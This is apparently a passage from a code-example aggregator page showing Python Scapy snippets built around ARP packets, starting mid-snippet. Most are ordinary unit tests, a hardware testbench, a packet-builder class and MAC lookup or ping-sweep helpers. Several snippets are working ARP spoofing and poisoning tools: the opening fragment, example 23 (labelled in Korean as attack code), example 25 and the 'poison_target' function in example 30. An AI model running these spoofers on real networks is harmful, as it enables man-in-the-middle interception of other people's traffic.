        op='is-at', psrc=host, pdst=target_ip, hwdst=target_mac)
    print(pkt.show())
    try:
        sendp(pkt, inter=2, loop=1)
    except KeyboardInterrupt:
        print('Cleaning...')
        sendp(Ether(src=host_mac) / ARP(op='is-at',
                                        psrc=host,
                                        hwsrc=host_mac,
                                        pdst=target_ip,
                                        hwdst=target_mac),
              inter=1,
              count=3)
Ejemplo n.º 20
0
def get_mac(ip_address, interface):
    my_packet = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=ip_address)
    return srp1(my_packet, verbose=0, iface=interface).hwsrc
Ejemplo n.º 21
0
class scapy(object):
    SCAPY_LAYERS = {
        'ether': Ether(dst="ff:ff:ff:ff:ff:ff"),
        'vlan': Dot1Q(),
        'etag': None,
        '1588': Ether(type=0x88f7),
        'arp': ARP(),
        'ipv4': IP(),
        'ipv4ihl': IP(ihl=10),
        'ipv4_ext': IP(frag=5),
        'ipv6': IPv6(src="::1"),
        'ipv6_ext': IPv6(src="::1", nh=43) / IPv6ExtHdrRouting(),
        'ipv6_ext2': IPv6() / IPv6ExtHdrRouting(),
        'udp': UDP(),
        'tcp': TCP(),
        'sctp': SCTP(),
        'icmp': ICMP(),
        'gre': GRE(),
        'raw': Raw(),
        'vxlan': Vxlan(),
        'inner_mac': Ether(),
        'inner_vlan': Dot1Q(),
        'inner_ipv4': IP(),
        'inner_ipv4_ext': IP(),
        'inner_ipv6': IPv6(src="::1"),
        'inner_ipv6_ext': IPv6(src="::1"),
        'inner_tcp': TCP(),
        'inner_udp': UDP(),
        'inner_sctp': SCTP(),
        'inner_icmp': ICMP(),
        'lldp': None,
        'ip_frag': IP(frag=5),
        'ipv6_frag': IPv6(src="::1") / IPv6ExtHdrFragment(),
        'ip_in_ip': IP() / IP(),
        'ip_in_ip_frag': IP() / IP(frag=5),
        'ipv6_in_ip': IP() / IPv6(src="::1"),
        'ipv6_frag_in_ip':
        IP() / IPv6(src="::1", nh=44) / IPv6ExtHdrFragment(),
        'nvgre': None,
        'geneve': "Not Implement",
    }

    def __init__(self):
        self.pkt = None
        pass

    def assign_pkt(self, pkt):
        self.pkt = pkt

    def add_layers(self, layers):
        self.pkt = None
        for layer in layers:
            if self.pkt is not None:
                self.pkt = self.pkt / self.SCAPY_LAYERS[layer]
            else:
                self.pkt = self.SCAPY_LAYERS[layer]

    def ether(self,
              pkt_layer,
              dst="ff:ff:ff:ff:ff:ff",
              src="00:00:20:00:00:00",
              type=None):
        if pkt_layer.name != "Ethernet":
            return
        pkt_layer.dst = dst
        pkt_layer.src = src
        if type is not None:
            pkt_layer.type = type

    def vlan(self, pkt_layer, vlan, prio=0, type=None):
        if pkt_layer.name != "802.1Q":
            return
        pkt_layer.vlan = int(vlan)
        pkt_layer.prio = prio
        if type is not None:
            pkt_layer.type = type

    def strip_vlan(self, element):
        value = None

        if self.pkt.haslayer('Dot1Q') is 0:
            return None

        if element == 'vlan':
            value = int(str(self.pkt[Dot1Q].vlan))
        return value

    def etag(self, pkt_layer, ECIDbase=0, prio=0, type=None):
        if pkt_layer.name != "802.1BR":
            return
        pkt_layer.ECIDbase = int(ECIDbase)
        pkt_layer.prio = prio
        if type is not None:
            pkt_layer.type = type

    def strip_etag(self, element):
        value = None

        if self.pkt.haslayer('Dot1BR') is 0:
            return None

        if element == 'ECIDbase':
            value = int(str(self.pkt[Dot1BR].ECIDbase))
        return value

    def strip_layer2(self, element):
        value = None
        layer = self.pkt.getlayer(0)
        if layer is None:
            return None

        if element == 'src':
            value = layer.src
        elif element == 'dst':
            value = layer.dst
        elif element == 'type':
            value = layer.type

        return value

    def strip_layer3(self, element):
        value = None
        layer = self.pkt.getlayer(1)
        if layer is None:
            return None

        if element == 'src':
            value = layer.src
        elif element == 'dst':
            value = layer.dst
        else:
            value = layer.getfieldval(element)

        return value

    def strip_layer4(self, element):
        value = None
        layer = self.pkt.getlayer(2)
        if layer is None:
            return None

        if element == 'src':
            value = layer.sport
        elif element == 'dst':
            value = layer.dport
        else:
            value = layer.getfieldval(element)

        return value

    def ipv4(self,
             pkt_layer,
             frag=0,
             src="127.0.0.1",
             proto=None,
             tos=0,
             dst="127.0.0.1",
             chksum=None,
             len=None,
             version=4,
             flags=None,
             ihl=None,
             ttl=64,
             id=1,
             options=None):
        pkt_layer.frag = frag
        pkt_layer.src = src
        if proto is not None:
            pkt_layer.proto = proto
        pkt_layer.tos = tos
        pkt_layer.dst = dst
        if chksum is not None:
            pkt_layer.chksum = chksum
        if len is not None:
            pkt_layer.len = len
        pkt_layer.version = version
        if flags is not None:
            pkt_layer.flags = flags
        if ihl is not None:
            pkt_layer.ihl = ihl
        pkt_layer.ttl = ttl
        pkt_layer.id = id
        if options is not None:
            pkt_layer.options = options

    def ipv6(self,
             pkt_layer,
             version=6,
             tc=0,
             fl=0,
             plen=0,
             nh=0,
             hlim=64,
             src="::1",
             dst="::1"):
        """
        Configure IPv6 protocal.
        """
        pkt_layer.version = version
        pkt_layer.tc = tc
        pkt_layer.fl = fl
        if plen:
            pkt_layer.plen = plen
        if nh:
            pkt_layer.nh = nh
        pkt_layer.src = src
        pkt_layer.dst = dst

    def tcp(self,
            pkt_layer,
            src=53,
            dst=53,
            flags=None,
            len=None,
            chksum=None):
        pkt_layer.sport = src
        pkt_layer.dport = dst
        if flags is not None:
            pkt_layer.flags = flags
        if len is not None:
            pkt_layer.len = len
        if chksum is not None:
            pkt_layer.chksum = chksum

    def udp(self, pkt_layer, src=53, dst=53, len=None, chksum=None):
        pkt_layer.sport = src
        pkt_layer.dport = dst
        if len is not None:
            pkt_layer.len = len
        if chksum is not None:
            pkt_layer.chksum = chksum

    def sctp(self, pkt_layer, src=53, dst=53, tag=None, len=None, chksum=None):
        pkt_layer.sport = src
        pkt_layer.dport = dst
        if tag is not None:
            pkt_layer.tag = tag
        if len is not None:
            pkt_layer.len = len
        if chksum is not None:
            pkt_layer.chksum = chksum

    def raw(self, pkt_layer, payload=None):
        if payload is not None:
            pkt_layer.load = ''
            for hex1, hex2 in payload:
                pkt_layer.load += struct.pack("=B",
                                              int('%s%s' % (hex1, hex2), 16))

    def gre(self, pkt_layer, proto=None):
        if proto is not None:
            pkt_layer.proto = proto

    def vxlan(self, pkt_layer, vni=0):
        pkt_layer.vni = vni

    def read_pcap(self, file):
        pcap_pkts = []
        try:
            pcap_pkts = rdpcap(file)
        except:
            pass

        return pcap_pkts

    def write_pcap(self, file):
        try:
            wrpcap(file, self.pkt)
        except:
            pass

    def send_pcap_pkt(self, crb=None, file='', intf='', count=1):
        if intf == '' or file == '' or crb is None:
            print "Invalid option for send packet by scapy"
            return

        content = 'pkts=rdpcap(\"%s\");sendp(pkts, iface=\"%s\", count=\"%s\" );exit()' % (
            file, intf, count)
        cmd_file = '/tmp/scapy_%s.cmd' % intf

        crb.create_file(content, cmd_file)
        crb.send_expect("scapy -c scapy_%s.cmd &" % intf, "# ")

    def print_summary(self):
        print "Send out pkt %s" % self.pkt.summary()

    def send_pkt(self, intf='', count=1):
        self.print_summary()

        if intf != '':
            # wait few seconds for link ready
            countdown = 600
            while countdown:
                link_st = subprocess.check_output("ip link show %s" % intf,
                                                  stderr=subprocess.STDOUT,
                                                  shell=True)
                if "LOWER_UP" in link_st:
                    break
                else:
                    time.sleep(0.01)
                    countdown -= 1
                    continue

            # fix fortville can't receive packets with 00:00:00:00:00:00
            if self.pkt.getlayer(0).src == "00:00:00:00:00:00":
                self.pkt.getlayer(0).src = get_if_hwaddr(intf)
            sendp(self.pkt, iface=intf, count=count)
Ejemplo n.º 22
0
    def test_proxy_arp(self):
        """ Proxy ARP """

        self.pg1.generate_remote_hosts(2)

        #
        # Proxy ARP rewquest packets for each interface
        #
        arp_req_pg0 = (
            Ether(src=self.pg0.remote_mac, dst="ff:ff:ff:ff:ff:ff") /
            ARP(op="who-has",
                hwsrc=self.pg0.remote_mac,
                pdst="10.10.10.3",
                psrc=self.pg0.remote_ip4))
        arp_req_pg0_tagged = (
            Ether(src=self.pg0.remote_mac, dst="ff:ff:ff:ff:ff:ff") /
            Dot1Q(vlan=0) / ARP(op="who-has",
                                hwsrc=self.pg0.remote_mac,
                                pdst="10.10.10.3",
                                psrc=self.pg0.remote_ip4))
        arp_req_pg1 = (
            Ether(src=self.pg1.remote_mac, dst="ff:ff:ff:ff:ff:ff") /
            ARP(op="who-has",
                hwsrc=self.pg1.remote_mac,
                pdst="10.10.10.3",
                psrc=self.pg1.remote_ip4))
        arp_req_pg2 = (
            Ether(src=self.pg2.remote_mac, dst="ff:ff:ff:ff:ff:ff") /
            ARP(op="who-has",
                hwsrc=self.pg2.remote_mac,
                pdst="10.10.10.3",
                psrc=self.pg1.remote_hosts[1].ip4))
        arp_req_pg3 = (
            Ether(src=self.pg3.remote_mac, dst="ff:ff:ff:ff:ff:ff") /
            ARP(op="who-has",
                hwsrc=self.pg3.remote_mac,
                pdst="10.10.10.3",
                psrc=self.pg3.remote_ip4))

        #
        # Configure Proxy ARP for 10.10.10.0 -> 10.10.10.124
        #
        self.vapi.proxy_arp_add_del(inet_pton(AF_INET, "10.10.10.2"),
                                    inet_pton(AF_INET, "10.10.10.124"))

        #
        # No responses are sent when the interfaces are not enabled for proxy
        # ARP
        #
        self.send_and_assert_no_replies(self.pg0, arp_req_pg0,
                                        "ARP req from unconfigured interface")
        self.send_and_assert_no_replies(self.pg2, arp_req_pg2,
                                        "ARP req from unconfigured interface")

        #
        # Make pg2 un-numbered to pg1
        #  still won't reply.
        #
        self.pg2.set_unnumbered(self.pg1.sw_if_index)

        self.send_and_assert_no_replies(self.pg2, arp_req_pg2,
                                        "ARP req from unnumbered interface")

        #
        # Enable each interface to reply to proxy ARPs
        #
        for i in self.pg_interfaces:
            i.set_proxy_arp()

        #
        # Now each of the interfaces should reply to a request to a proxied
        # address
        #
        self.pg0.add_stream(arp_req_pg0)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg0.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg0.local_mac, self.pg0.remote_mac,
                             "10.10.10.3", self.pg0.remote_ip4)

        self.pg0.add_stream(arp_req_pg0_tagged)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg0.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg0.local_mac, self.pg0.remote_mac,
                             "10.10.10.3", self.pg0.remote_ip4)

        self.pg1.add_stream(arp_req_pg1)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg1.local_mac, self.pg1.remote_mac,
                             "10.10.10.3", self.pg1.remote_ip4)

        self.pg2.add_stream(arp_req_pg2)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg2.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg2.local_mac, self.pg2.remote_mac,
                             "10.10.10.3", self.pg1.remote_hosts[1].ip4)

        #
        # A request for an address out of the configured range
        #
        arp_req_pg1_hi = (
            Ether(src=self.pg1.remote_mac, dst="ff:ff:ff:ff:ff:ff") /
            ARP(op="who-has",
                hwsrc=self.pg1.remote_mac,
                pdst="10.10.10.125",
                psrc=self.pg1.remote_ip4))
        self.send_and_assert_no_replies(self.pg1, arp_req_pg1_hi,
                                        "ARP req out of range HI")
        arp_req_pg1_low = (
            Ether(src=self.pg1.remote_mac, dst="ff:ff:ff:ff:ff:ff") /
            ARP(op="who-has",
                hwsrc=self.pg1.remote_mac,
                pdst="10.10.10.1",
                psrc=self.pg1.remote_ip4))
        self.send_and_assert_no_replies(self.pg1, arp_req_pg1_low,
                                        "ARP req out of range Low")

        #
        # Request for an address in the proxy range but from an interface
        # in a different VRF
        #
        self.send_and_assert_no_replies(self.pg3, arp_req_pg3,
                                        "ARP req from different VRF")

        #
        # Disable Each interface for proxy ARP
        #  - expect none to respond
        #
        for i in self.pg_interfaces:
            i.set_proxy_arp(0)

        self.send_and_assert_no_replies(self.pg0, arp_req_pg0,
                                        "ARP req from disable")
        self.send_and_assert_no_replies(self.pg1, arp_req_pg1,
                                        "ARP req from disable")
        self.send_and_assert_no_replies(self.pg2, arp_req_pg2,
                                        "ARP req from disable")

        #
        # clean up on interface 2
        #
        self.pg2.unset_unnumbered(self.pg1.sw_if_index)
Ejemplo n.º 23
0
# ARP SPOOFING 공격 코드

from scapy.all import *
from scapy.layers.l2 import ARP

arp = ARP(op=2,
          psrc='172.30.1.28',
          pdst='172.30.1.50',
          hwsrc='C8:F7:33:51:FB:53',
          hwdst='F8:63:3F:62:6D:80')
send(arp)
Ejemplo n.º 24
0
def arpPing():
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="10.0.0.0/24"),
                     timeout=2)
    ans.summary(lambda s, r: r.sprintf("%Ether.src% %ARP.psrc%"))
Ejemplo n.º 25
0
#!/usr/bin/python3
import sys
import time
from scapy.layers.l2 import sendp, ARP, Ether

if len(sys.argv) < 3:
    print(sys.argv[0] + ": <target> <spoof_ip>")
    sys.exit(1)

iface = "wlp2s0"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]

ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp

while True:
    sendp(packet, iface=iface)
    time.sleep(1)
Ejemplo n.º 26
0
async def run_test(dut):

    tb = TB(dut)

    await tb.init()

    tb.log.info("test UDP RX packet")

    payload = bytes([x % 256 for x in range(256)])
    eth = Ether(src='5a:51:52:53:54:55', dst='02:00:00:00:00:00')
    ip = IP(src='192.168.1.100', dst='192.168.1.128')
    udp = UDP(sport=5678, dport=1234)
    test_pkt = eth / ip / udp / payload

    test_frame = GmiiFrame.from_payload(test_pkt.build())

    await tb.mii_phy.rx.send(test_frame)

    tb.log.info("receive ARP request")

    rx_frame = await tb.mii_phy.tx.recv()

    rx_pkt = Ether(bytes(rx_frame.get_payload()))

    tb.log.info("RX packet: %s", repr(rx_pkt))

    assert rx_pkt.dst == 'ff:ff:ff:ff:ff:ff'
    assert rx_pkt.src == test_pkt.dst
    assert rx_pkt[ARP].hwtype == 1
    assert rx_pkt[ARP].ptype == 0x0800
    assert rx_pkt[ARP].hwlen == 6
    assert rx_pkt[ARP].plen == 4
    assert rx_pkt[ARP].op == 1
    assert rx_pkt[ARP].hwsrc == test_pkt.dst
    assert rx_pkt[ARP].psrc == test_pkt[IP].dst
    assert rx_pkt[ARP].hwdst == '00:00:00:00:00:00'
    assert rx_pkt[ARP].pdst == test_pkt[IP].src

    tb.log.info("send ARP response")

    eth = Ether(src=test_pkt.src, dst=test_pkt.dst)
    arp = ARP(hwtype=1,
              ptype=0x0800,
              hwlen=6,
              plen=4,
              op=2,
              hwsrc=test_pkt.src,
              psrc=test_pkt[IP].src,
              hwdst=test_pkt.dst,
              pdst=test_pkt[IP].dst)
    resp_pkt = eth / arp

    resp_frame = GmiiFrame.from_payload(resp_pkt.build())

    await tb.mii_phy.rx.send(resp_frame)

    tb.log.info("receive UDP packet")

    rx_frame = await tb.mii_phy.tx.recv()

    rx_pkt = Ether(bytes(rx_frame.get_payload()))

    tb.log.info("RX packet: %s", repr(rx_pkt))

    assert rx_pkt.dst == test_pkt.src
    assert rx_pkt.src == test_pkt.dst
    assert rx_pkt[IP].dst == test_pkt[IP].src
    assert rx_pkt[IP].src == test_pkt[IP].dst
    assert rx_pkt[UDP].dport == test_pkt[UDP].sport
    assert rx_pkt[UDP].sport == test_pkt[UDP].dport
    assert rx_pkt[UDP].payload == test_pkt[UDP].payload

    await RisingEdge(dut.clk)
    await RisingEdge(dut.clk)
Ejemplo n.º 27
0
    def test_arp(self):
        """ ARP """

        #
        # Generate some hosts on the LAN
        #
        self.pg1.generate_remote_hosts(4)

        #
        # Send IP traffic to one of these unresolved hosts.
        #  expect the generation of an ARP request
        #
        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1._remote_hosts[1].ip4) /
             UDP(sport=1234, dport=1234) /
             Raw())

        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)

        self.verify_arp_req(rx[0],
                            self.pg1.local_mac,
                            self.pg1.local_ip4,
                            self.pg1._remote_hosts[1].ip4)

        #
        # And a dynamic ARP entry for host 1
        #
        dyn_arp = VppNeighbor(self,
                              self.pg1.sw_if_index,
                              self.pg1.remote_hosts[1].mac,
                              self.pg1.remote_hosts[1].ip4)
        dyn_arp.add_vpp_config()

        #
        # now we expect IP traffic forwarded
        #
        dyn_p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
                 IP(src=self.pg0.remote_ip4,
                    dst=self.pg1._remote_hosts[1].ip4) /
                 UDP(sport=1234, dport=1234) /
                 Raw())

        self.pg0.add_stream(dyn_p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)

        self.verify_ip(rx[0],
                       self.pg1.local_mac,
                       self.pg1.remote_hosts[1].mac,
                       self.pg0.remote_ip4,
                       self.pg1._remote_hosts[1].ip4)

        #
        # And a Static ARP entry for host 2
        #
        static_arp = VppNeighbor(self,
                                 self.pg1.sw_if_index,
                                 self.pg1.remote_hosts[2].mac,
                                 self.pg1.remote_hosts[2].ip4,
                                 is_static=1)
        static_arp.add_vpp_config()

        static_p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
                    IP(src=self.pg0.remote_ip4,
                       dst=self.pg1._remote_hosts[2].ip4) /
                    UDP(sport=1234, dport=1234) /
                    Raw())

        self.pg0.add_stream(static_p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)

        self.verify_ip(rx[0],
                       self.pg1.local_mac,
                       self.pg1.remote_hosts[2].mac,
                       self.pg0.remote_ip4,
                       self.pg1._remote_hosts[2].ip4)

        #
        # flap the link. dynamic ARPs get flush, statics don't
        #
        self.pg1.admin_down()
        self.pg1.admin_up()

        self.pg0.add_stream(static_p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        rx = self.pg1.get_capture(1)

        self.verify_ip(rx[0],
                       self.pg1.local_mac,
                       self.pg1.remote_hosts[2].mac,
                       self.pg0.remote_ip4,
                       self.pg1._remote_hosts[2].ip4)

        self.pg0.add_stream(dyn_p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)
        self.verify_arp_req(rx[0],
                            self.pg1.local_mac,
                            self.pg1.local_ip4,
                            self.pg1._remote_hosts[1].ip4)

        #
        # Send an ARP request from one of the so-far unlearned remote hosts
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff",
                   src=self.pg1._remote_hosts[3].mac) /
             ARP(op="who-has",
                 hwsrc=self.pg1._remote_hosts[3].mac,
                 pdst=self.pg1.local_ip4,
                 psrc=self.pg1._remote_hosts[3].ip4))

        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)
        self.verify_arp_resp(rx[0],
                             self.pg1.local_mac,
                             self.pg1._remote_hosts[3].mac,
                             self.pg1.local_ip4,
                             self.pg1._remote_hosts[3].ip4)

        #
        # VPP should have learned the mapping for the remote host
        #
        self.assertTrue(find_nbr(self,
                                 self.pg1.sw_if_index,
                                 self.pg1._remote_hosts[3].ip4))

        #
        # ERROR Cases
        #  1 - don't respond to ARP request for address not within the
        #      interface's sub-net
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 pdst="10.10.10.3",
                 psrc=self.pg0.remote_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local destination")

        #
        #  2 - don't respond to ARP request from an address not within the
        #      interface's sub-net
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 psrc="10.10.10.3",
                 pdst=self.pg0.local_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local source")

        #
        #  3 - don't respond to ARP request from an address that belongs to
        #      the router
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 psrc=self.pg0.local_ip4,
                 pdst=self.pg0.local_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local source")

        #
        #  4 - don't respond to ARP requests that has mac source different
        #      from ARP request HW source
        #      the router
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc="00:00:00:DE:AD:BE",
                 psrc=self.pg0.remote_ip4,
                 pdst=self.pg0.local_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local source")

        #
        # cleanup
        #
        dyn_arp.remove_vpp_config()
        static_arp.remove_vpp_config()
Ejemplo n.º 28
0
 def arp_req(cls, src_host, host):
     return (Ether(dst="ff:ff:ff:ff:ff:ff", src=src_host.mac) /
             ARP(op="who-has",
                 hwsrc=src_host.bin_mac,
                 pdst=host.ip4,
                 psrc=src_host.ip4))
Ejemplo n.º 29
0
from scapy.all import *
from scapy.layers.l2 import ARP, Ether

for lsb in range(50):
    ip = "10.21.0.{}".format(lsb)
    arp_req = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip,
                                                   hwdst="ff:ff:ff:ff:ff:ff")
    arp_res = srp1(arp_req, timeout=1, verbose=0)
    if arp_res:
        print("IP: {}, MAC: {}".format(arp_res.psrc, arp_res.hwsrc))
Ejemplo n.º 30
0
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):

    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip

    poison_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print '[*] Beginning the ARP poison. [CTRL_C to stop]'

    while True:
        try:
            send(poison_target)
            send(poison_gateway)

            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

    print '[*] ARP poison attack finished'
    return
def get_mac_by_ip(ip="192.168.0.1"):
    """通过 IP 获取对方 MAC"""
    answer = srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=2)
    if answer is not None:
        return answer[Ether].src
    return ""